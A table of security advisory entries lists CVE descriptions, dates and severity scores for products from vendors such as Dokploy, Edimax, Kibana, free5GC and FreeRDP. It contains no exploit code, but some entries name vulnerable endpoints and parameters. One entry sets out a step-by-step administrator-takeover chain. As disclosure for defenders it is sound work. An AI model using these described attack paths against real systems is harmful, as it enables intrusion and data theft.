| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.6 and earlier, Dokploy contains a command injection vulnerability in the /docker-container-logs WebSocket endpoint. The tail and since parameters are not validated and are directly concatenated into shell commands, allowing authenticated users to execute arbitrary commands with root privileges. | 2026-05-29 | 9.9 | CVE-2026-45633 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.5 and earlier, a critical path traversal vulnerability exists in Dokploy v0.26.5 that allows authenticated users to write arbitrary files to the filesystem during application deployment. When combined with Dokploy's remote server deployment feature, this vulnerability enables arbitrary file write to remote server filesystems, automatic remote code execution via cron jobs, complete server compromise, data exfiltration without user interaction, and persistent backdoor installation. This vulnerability bypasses all container isolation on remote server deployments. | 2026-05-29 | 9.9 | CVE-2026-45661 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.1 and earlier, a command injection vulnerability exists in the Docker file upload functionality. When an authenticated user uploads a file to a container, the destinationPath parameter is not properly sanitized and is directly interpolated into a shell command string. By including shell metacharacters such as ; or ", an attacker can escape the intended docker cp command and execute arbitrary OS commands on the Dokploy host. | 2026-05-29 | 9.9 | CVE-2026-45663 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.0 and earlier, the deleteRegistry function in Dokploy (packages/server/src/services/registry.ts) executes docker logout ${response.registryUrl} without shell escaping. In the same file, the docker login command correctly uses shEscape() to prevent command injection. This inconsistency creates a command injection vulnerability when deleting a registry with a crafted registryUrl. | 2026-05-29 | 8.8 | CVE-2026-45662 |
| Dylan Kuhn--Geo Mashup | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dylan Kuhn Geo Mashup geo-mashup allows Reflected XSS.This issue affects Geo Mashup: from n/a through <= 1.13.19. | 2026-05-27 | 7.1 | CVE-2026-42734 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.4, a Host Header Injection vulnerability in the password reset page allows attackers to manipulate the Host header to generate password reset links pointing to attacker-controlled domains. This can lead to phishing attacks, account takeover, or other security risks. The severity is high, as the vulnerability affects a critical function related to user authentication. This vulnerability is fixed in 2.3.4. | 2026-05-26 | 8.1 | CVE-2026-43935 |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows Path Traversal.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.9. | 2026-05-27 | 8.6 | CVE-2026-42737 |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows DOM-Based XSS.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.9. | 2026-05-27 | 7.1 | CVE-2026-42762 |
| Edimax--BR-6478AC | A vulnerability was identified in Edimax BR-6478AC 1.23. Affected by this vulnerability is the function formPPPoESetup of the file /goform/formPPPoESetup of the component POST Request Handler. The manipulation of the argument pppUserName leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-05-30 | 8.8 | CVE-2026-10125 |
| Edimax--BR-6478AC | A security flaw has been discovered in Edimax BR-6478AC 1.23. Affected by this issue is the function formQoS of the file /goform/formQoS of the component POST Request Handler. The manipulation of the argument selSSID results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-30 | 8.8 | CVE-2026-10126 |
| Edimax--BR-6478AC | A vulnerability has been found in Edimax BR-6478AC 1.23. This issue affects the function formUSBAccount of the file /goform/formUSBAccount of the component POST Request Handler. The manipulation of the argument UserName/Password leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-31 | 8.8 | CVE-2026-10163 |
| Edimax--BR-6478AC | A vulnerability was found in Edimax BR-6478AC 1.23. Impacted is the function formUSBFolder of the file /goform/formUSBFolder of the component POST Request Handler. The manipulation of the argument ShareName/SelectName results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-31 | 8.8 | CVE-2026-10164 |
| Edimax--BR-6478AC | A vulnerability was identified in Edimax BR-6478AC 1.23. The impacted element is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. Such manipulation of the argument pppUserName leads to stack-based buffer overflow. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-31 | 8.8 | CVE-2026-10165 |
| Edimax--BR-6478AC | A weakness has been identified in Edimax BR-6478AC 1.23. This affects the function formiNICSiteSurvey of the file /goform/formiNICSiteSurvey of the component POST Request Handler. Executing a manipulation of the argument selSSID can lead to buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9442 |
| Edimax--BR-6478AC | A security vulnerability has been detected in Edimax BR-6478AC 1.23. This vulnerability affects the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. The manipulation of the argument L2TPUserName leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9443 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.31. The impacted element is the function formWlanMP of the file /goform/formWlanMP. The manipulation of the argument ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9425 |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.31. This affects the function formHwSet of the file /goform/formHwSet. The manipulation of the argument Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/initgain/txcck/txofdm/submit-url results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9426 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn 1.31. This impacts the function formWlSiteSurvey of the file /goform/formWlSiteSurvey of the component webs. This manipulation of the argument selSSID/submit-url causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9427 |
| Edimax--EW-7438RPn | A security flaw has been discovered in Edimax EW-7438RPn 1.31. This affects the function formConnectionSetting of the file /goform/formConnectionSetting. Performing a manipulation of the argument max_Conn/timeOut results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9459 |
| Edimax--EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn 1.31. This impacts the function formAccept of the file /goform/formAccept. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9460 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.31. Affected is the function formRadius of the file /goform/formRadius. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9461 |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.31. Affected by this vulnerability is the function formWpsProxyEnable of the file /goform/formWpsProxyEnable. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9462 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn 1.31. Affected by this issue is the function formLicence of the file /goform/formLicence. This manipulation of the argument submit-url causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9463 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.31. The affected element is the function formLogout of the file /goform/formLogout. The manipulation of the argument submit-url leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9479 |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.31. The impacted element is the function formrefresh of the file /goform/formrefresh. The manipulation of the argument submit-url results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9480 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn 1.31. This affects the function formStats of the file /goform/formStats. This manipulation of the argument submit-url causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9481 |
| Edimax--EW-7438RPn | A vulnerability has been found in Edimax EW-7438RPn 1.31. This impacts the function formSDHCP of the file /goform/formSDHCP. Such manipulation of the argument submit-url leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9482 |
| edward_plainview--MyCryptoCheckout | Missing Authorization vulnerability in edward_plainview MyCryptoCheckout allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MyCryptoCheckout: from n/a through 2.161. | 2026-05-25 | 7.5 | CVE-2026-45209 |
| Elastic--Kibana | Server-Side Request Forgery (CWE-918) in Kibana allows authenticated users with connector management privileges to bypass the operator-configured connection allowlist. By configuring a Webhook connector with a crafted target, an attacker can cause Kibana to issue outbound requests to destinations that the egress restriction controls were intended to block. | 2026-05-28 | 7.7 | CVE-2026-42398 |
| Elastic--Kibana | Improper Input Validation (CWE-20) in the Kibana Fleet agent policy management feature can lead to privilege escalation. An authenticated user with Fleet management privileges can manipulate agent policy configuration by injecting values into a configuration override mechanism that is not adequately validated. An attacker can cause Elastic Agents to be issued API keys with elevated Elasticsearch privileges, potentially granting unauthorized read and write access to sensitive Elasticsearch security indices beyond what is intended for the Fleet management role. | 2026-05-28 | 7.2 | CVE-2026-49095 |
| ellanetworks--core | Ella Core is a 5G core designed for private networks. Prior to 1.10.0, a radio with a valid NG Setup can send a forged PDUSessionResourceSetupResponse carrying any UE's AMF-UE-NGAP-ID. Ella Core does not verify the message arrived on the SCTP association bound to that UE's logical NG-connection, then creates a GTP tunnel towards that radio. This vulnerability is fixed in 1.10.0. | 2026-05-27 | 7.1 | CVE-2026-44473 |
| eMagicOne--eMagicOne Store Manager | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in eMagicOne eMagicOne Store Manager allows Blind SQL Injection. This issue affects eMagicOne Store Manager: from n/a through 1.3.2. | 2026-05-25 | 9.3 | CVE-2026-42773 |
| Endonesia--eNdonesia Portal | eNdonesia Portal 8.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through parameters in mod.php. Attackers can inject SQL through the artid, cid, did, contid, and aboutid parameters to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25405 |
| Endonesia--eNdonesia Portal | eNdonesia Portal 8.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through parameters in mod.php. Attackers can inject SQL through the artid, cid, did, contid, and aboutid parameters across publisher, diskusi, galeri, content, and about modules to extract database credentials, usernames, and version information. | 2026-05-30 | 8.2 | CVE-2018-25406 |
| Endonesia--eNdonesia Portal | eNdonesia Portal 8.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through parameters in mod.php. Attackers can inject SQL through the artid, cid, did, contid, and aboutid parameters across publisher, diskusi, galeri, content, and about modules to extract database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25407 |
| Eppendorf--BioFlo 320 | Eppendorf BioFlo 320 is vulnerable to due to VNC server using a hard-coded password. If a remote attacker knows the network address of any BioFlo 320 model with remote access enabled, they can gain full control of the user interface by using this password. Once connected, the attacker would have full access to all control panel features for the BioFlo 320. VNC traffic is not encrypted. | 2026-05-26 | 9.8 | CVE-2026-7251 |
| eregistrasi-kejuaraan-silat--Registrasi Pencak Silat | E-Registrasi Pencak Silat 18.10 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id_partai parameter. Attackers can send GET requests to monitor_nilai.php with crafted SQL payloads in the id_partai parameter to extract sensitive database information including admin credentials and user data. | 2026-05-29 | 8.2 | CVE-2018-25385 |
| error311--FileRise | FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. Prior to 3.12.0, /api/totp_setup.php is callable from a session that has only passed the password check (state pending_login_user). When the target account already has TOTP configured, the endpoint decrypts and returns the user's existing TOTP secret inside the QR PNG instead of refusing or generating a new secret. An attacker who already possesses the victim's password can therefore retrieve the live TOTP secret, derive a valid one-time code, submit it to /api/totp_verify.php, and obtain a fully authenticated session without ever possessing the victim's authenticator device. This vulnerability is fixed in 3.12.0. | 2026-05-27 | 7.4 | CVE-2026-44460 |
| eskapism--Simple History Track, Log, and Audit WordPress Changes | The Simple History - Track, Log, and Audit WordPress Changes plugin for WordPress is vulnerable to authenticated (Subscriber+) account takeover in all versions up to, and including, 5.26.0 via the event reaction endpoints (react_to_event() / unreact_to_event()). The endpoints register get_items_permissions_check() as their permission_callback, which only verifies the requester is logged in and does not enforce the per-logger capability checks normally applied by Log_Query. As a result, a Subscriber-level user can POST to /wp-json/simple-history/v1/events/<id>/react with the _fields=context query parameter and read the full context of any Simple History event - including SimpleUserLogger entries that record the full password-reset email body (reset URL with the reset key) for any user. The attacker triggers a password reset for an administrator via the lost-password form, brute-forces recent event IDs through the reaction endpoint to read the resulting user_requested_password_reset_link event, extracts the reset key from context.message, and completes the password reset to take over the administrator account. Exploitation requires an administrator to have first enabled the experimental features option (simple_history_experimental_features_enabled), which is not the default. | 2026-05-30 | 7.5 | CVE-2026-7459 |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for web development. In 137 and earlier, a Local File Inclusion (LFI) vulnerability exists in the esbuild plugin's handling of the browser field in package.json. An attacker can publish an npm package that causes the server to read and return arbitrary files from the host filesystem during the build process. | 2026-05-28 | 7.5 | CVE-2026-44594 |
| espressif--shared-github-dangerjs | Espressif Shared GitHub DangerJS is a reusable GitHub Action CI DangerJS workflow for Espressif GitHub projects. Prior to 1.0.1, the action's entrypoint.sh invoked DangerJS from the caller's workspace after copying the fork's checkout into it, creating an untrusted search path for both binary resolution and Node.js module resolution. A fork pull request processed by a pull_request_target workflow could therefore cause fork-supplied code to execute inside the action container in place of the action's own code. This vulnerability is fixed in 1.0.1. | 2026-05-28 | 8.2 | CVE-2026-44358 |
| Extro--eXtroForms | Joomla Component eXtroForms 2.1.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL commands through the filter_type_id, filter_pid_id, and filter_search parameters. Attackers can submit POST requests to the extroformfield view with malicious SQL payloads to extract sensitive database information and server data. | 2026-05-25 | 7.1 | CVE-2018-25380 |
| Extro--Responsive Portfolio | Joomla Responsive Portfolio 1.6.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL commands through multiple filter parameters. Attackers can inject malicious SQL code via the filter_type_id, filter_pid_id, and filter_search parameters in POST requests to extract sensitive database information including credentials and server details. | 2026-05-25 | 7.1 | CVE-2018-25381 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, AccessControlInterceptor, the authentication gate for all Struts2 actions, unconditionally calls invocation.invoke() without checking for a valid session. Four action methods in BoilerPlateConfig perform no local session check either, allowing an unauthenticated attacker to read, overwrite, deactivate, and permanently delete any boilerplate template in the system. This vulnerability is fixed in 1.8.3. | 2026-05-26 | 9.8 | CVE-2026-44668 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, Faction is vulnerable to stored cross-site scripting (XSS) via attachment filenames in remediation verification file preview flows. User-supplied filename values are persisted and then rendered into HTML and attribute contexts without output encoding, allowing attacker-controlled JavaScript to execute in the browser of any user who opens the affected verification/remediation views. Because the payload is stored server-side and rendered to other users, exploitation is persistent and can impact privileged accounts. This vulnerability is fixed in 1.8.3. | 2026-05-26 | 8.7 | CVE-2026-44667 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, Faction is vulnerable to stored cross-site scripting (XSS) via attachment filenames in assessment file preview flows. User-supplied filename values are persisted and later rendered into HTML/attribute contexts without output encoding, allowing attacker-controlled JavaScript to execute in the browser of any user who views the affected page. Because the payload is stored server-side and rendered to other users, exploitation is persistent and can impact privileged accounts. This vulnerability is fixed in 1.8.3. | 2026-05-26 | 8.7 | CVE-2026-44669 |
| flippercode--WP Maps Pro | The WP Maps Pro plugin for WordPress is vulnerable to Privilege Escalation via Administrator Account Creation in all versions up to, and including, 6.1.0. This is due to the wpgmp_temp_access_ajax AJAX action being registered with wp_ajax_nopriv_ and protected only by a nonce check using the fc-call-nonce nonce, which is publicly embedded into every frontend page via wp_localize_script as the nonce field of the wpgmp_local JavaScript object, rendering the check ineffective as an access control mechanism. This makes it possible for unauthenticated attackers to invoke the wpgmp_temp_access_support handler with check_temp=false, which unconditionally creates a new WordPress user with the hardcoded role of administrator via wp_insert_user() and returns a magic login URL that, when visited, calls wp_set_auth_cookie() to fully authenticate the attacker as the newly created administrator, resulting in complete site takeover. | 2026-05-29 | 9.8 | CVE-2026-8732 |
| FoundDream--miniclawd | A security vulnerability has been detected in FoundDream miniclawd up to 2d65665046e2222eeea76cafc8570ed546a8c125. Affected by this issue is the function ExecTool.execute of the file /src/tools/exec.ts. Such manipulation leads to os command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9452 |
| FoundDream--miniclawd | A vulnerability was detected in FoundDream miniclawd up to 2d65665046e2222eeea76cafc8570ed546a8c125. This affects the function which of the file /src/application/skills-loader.ts of the component SkillsLoader. Performing a manipulation of the argument requires.bins results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9453 |
| Fourth Frontier--Frontier X Android application | The Frontier X2 device allows unauthenticated BLE read/write access to critical GATT characteristics without enforcing pairing authentication or authorization. This allows attackers within BLE range to perform unauthorized control of device functions, including starting/stopping activities, triggering vibrations, causing denial-of-service conditions, and fuzzing characteristic values to induce unexpected behavior. Additionally, the Frontier X mobile application lacks proper BLE device authentication, allowing attackers to impersonate a legitimate Frontier X2 device and connect to the application. By cloning BLE advertisements and exposing expected GATT characteristics, attackers can manipulate activity states and inject fabricated health telemetry such as breathing rate, heart rate, strain, and other health-related data into the mobile application. | 2026-05-29 | 8.8 | CVE-2026-5768 |
| fraillt--bitsery | A security vulnerability has been detected in fraillt bitsery up to 5.2.4. Affected is the function loadFromSharedState in the library include/bitsery/ext/std_smart_ptr.h. Such manipulation leads to improper validation of specified type of input. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 5.2.5 is able to address this issue. The name of the patch is 66d16516e24893bebc1c8af52bf2fe9ad0735061. Upgrading the affected component is advised. | 2026-05-26 | 7.3 | CVE-2026-9521 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the nnef-oam route group without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can hit the OAM route with no Authorization header at all and the handler returns 200 OK. The current OAM handler is a stub that returns null, but the structural defect is route-group-scoped: the entire OAM route group has no inbound auth middleware, so every future OAM operation added to this group inherits the missing auth boundary by default. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 10 | CVE-2026-44327 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's SMF mounts the UPI management route group without OAuth2/bearer-token authorization middleware. A network attacker who can reach SMF on the SBI can hit UPI endpoints with no Authorization header at all, and the requests reach the SMF business handlers. In the running Docker lab this was directly demonstrated for read (GET /upi/v1/upNodesLinks), write (POST /upi/v1/upNodesLinks with attacker-controlled UP-node and link payload), and delete (DELETE /upi/v1/upNodesLinks/{nodeID}) operations. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 10 | CVE-2026-44329 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the nnef-pfdmanagement route group without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can use a forged or arbitrary bearer token (e.g. Authorization: Bearer not-a-real-token) to read PFD application data via GET /applications and GET /applications/{appID}, and to create or delete PFD change-notification subscriptions via POST /subscriptions and DELETE /subscriptions/{subID}. Same root cause as the other NEF SBI findings: the route group is mounted without any inbound auth middleware. Unlike the OAM and traffic-influence groups, nnef-pfdmanagement IS declared in the runtime ServiceList, so this is the production-intended path that operators expect to be protected by OAuth2 setting receive from NRF: true -- and it is not. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 10 | CVE-2026-44330 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the 3gpp-pfd-management API without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can create, read, and delete PFD-management transaction state with a forged or arbitrary bearer token (e.g. Authorization: Bearer not-a-real-token). The route group is also reachable even when the running config's ServiceList does not declare it, so operators who think they disabled the service via config are still exposed. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 9.4 | CVE-2026-44315 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the 3gpp-traffic-influence API without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can create, read, patch, and delete traffic-influence subscriptions either with no Authorization header at all, or with a forged bearer token (e.g. Authorization: Bearer not-a-real-token). This includes creating AnyUeInd=true subscriptions intended to affect group / any-UE traffic steering. The route group is also reachable even when the running config's ServiceList does not declare it, so operators who think they disabled the service via config are still exposed. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 9.4 | CVE-2026-44326 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, PCF Npcf_SMPolicyControl missing authentication middleware allows unauthenticated access to SM policy handlers and disclosure of subscriber SUPI. In NewServer(), the smPolicyGroup route group is created and routes are applied without attaching the router authorization middleware. In contrast, other PCF service groups such as Npcf_PolicyAuthorization do attach RouterAuthorizationCheck before route registration. Because the middleware is missing, requests to the /npcf-smpolicycontrol/v1/sm-policies, /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}, /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}/update, and /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}/delete endpoints can reach business logic even when no valid OAuth token is provided. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 8.2 | CVE-2026-42083 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's SMF mounts the UPI management route group without inbound OAuth2 middleware. On top of that, the DELETE /upi/v1/upNodesLinks/{upNodeRef} handler unconditionally dereferences upNode.UPF after the type-guarded async release, even though AN-typed nodes are constructed without a UPF object. As a result, a single unauthenticated DELETE /upi/v1/upNodesLinks/gNB1 request crashes the handler with a nil-pointer panic AND mutates the in-memory user-plane topology before panicking (the UpNodeDelete(upNodeRef) line runs first). This is an unauthenticated, state-mutating panic-DoS sink that an off-path network attacker can trigger by name against any AN entry. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 8.2 | CVE-2026-44328 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's PCF POST /npcf-smpolicycontrol/v1/sm-policies handler (HandleCreateSmPolicyRequest) panics with a nil-pointer dereference when a downstream OpenAPI consumer call (UDR lookup) returns 404 Not Found and the consumer wrapper returns err != nil together with a nil response struct. The handler logs the OpenAPI error and continues executing instead of returning, then dereferences the nil response struct on a subsequent line and panics. Gin recovery converts the panic into HTTP 500, so a single attacker-shaped POST returns 500 instead of a clean 4xx whenever the downstream lookup fails. The PCF process keeps running. The trigger is a single POST containing input that causes the downstream UDR lookup to fail (e.g. an unknown DNN). In 4.2.1 this endpoint is also reachable WITHOUT an Authorization header because the PCF Npcf_SMPolicyControl route group is mounted without inbound auth middleware. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44316 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF terminates the entire process when a stored PFD-subscription notifyUri cannot be reached. In PfdChangeNotifier.FlushNotifications(), the notifier calls NnefPFDmanagementNotify(...) and on any delivery error invokes logger.PFDManageLog.Fatal(err), which is os.Exit(1)-equivalent in Go. An attacker who can create a PFD subscription with an attacker-chosen notifyUri and then trigger a PFD change can deterministically kill NEF on the asynchronous delivery attempt -- the process exits with status 1, dropping NEF's entire SBI surface until restart. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44319 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the nnef-callback route group without inbound OAuth2/bearer-token authorization. A forged or arbitrary bearer token (e.g. Authorization: Bearer not-a-real-token) is enough to reach the SMF-callback handler -- the callback body is parsed and dispatched into NEF business logic instead of being rejected at the auth boundary. Same root cause as the other NEF SBI findings: the route group is mounted without any inbound auth middleware. NEF does not authenticate the producer NF identity before processing callback content; if an attacker can guess or obtain a valid NotifId, this missing auth boundary lets forged callbacks act on real subscription state. The route group is also reachable even when the runtime ServiceList does not declare it (it lists only nnef-pfdmanagement and nnef-oam). This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.3 | CVE-2026-44320 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's SMF mounts the UPI management route group without inbound OAuth2 middleware. The POST /upi/v1/upNodesLinks create-or-update handler accepts attacker-controlled JSON and passes it directly into UpNodesFromConfiguration(), which calls logger.InitLog.Fatalf(...) on several validation failures. One confirmed path is the UE-IP-pool overlap check: a single unauthenticated POST that adds a new UPF whose pool overlaps an existing UPF terminates the entire SMF process (docker ps shows Exited (1)), not just the goroutine. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44321 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF PATCH /3gpp-pfd-management/v1/{afId}/transactions/{transId}/applications/{appId} handler panics with a nil-pointer dereference when the upstream UDR call fails AND the consumer wrapper returns err != nil together with a nil *ProblemDetails. The handler's errPfdData != nil branch builds its own problemDetailsErr correctly, but immediately after it reads problemDetails.Cause (the OTHER value, which is nil in this branch) and panics. Gin recovery converts the panic into HTTP 500, so a single PATCH against this endpoint returns 500 instead of the intended controlled error response whenever UDR access is failing. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44322 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NRF root SBI endpoint POST /oauth2/token contains a parser-level type-confusion bug family. The handler in NFs/nrf/internal/sbi/api_accesstoken.go reflects over models.NrfAccessTokenAccessTokenReq, special-cases only plain string and NrfNfManagementNfType fields, and treats every other field as if it were a single models.PlmnId. The parsed *models.PlmnId is then assigned with reflect.Value.Set() to whichever field name the attacker put in the form body, which panics whenever the destination field's real type is incompatible (slice, different struct, primitive). Gin recovery converts each panic into HTTP 500, but the endpoint remains remotely panicable from a single unauthenticated form-encoded request and is repeatedly triggerable. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44325 |
| FreeRDP--FreeRDP | FreeRDP before 3.26.0 contains a heap-buffer-overflow vulnerability in gdi_CacheToSurface that allows remote attackers to write out-of-bounds heap memory. The vulnerability occurs because rectangle validation clamps coordinates to UINT16_MAX but performs copy operations using unclamped cache entry dimensions, enabling malicious RDP servers to trigger large out-of-bounds writes and potentially achieve remote code execution or client crash. | 2026-05-26 | 8.8 | CVE-2026-40033 |
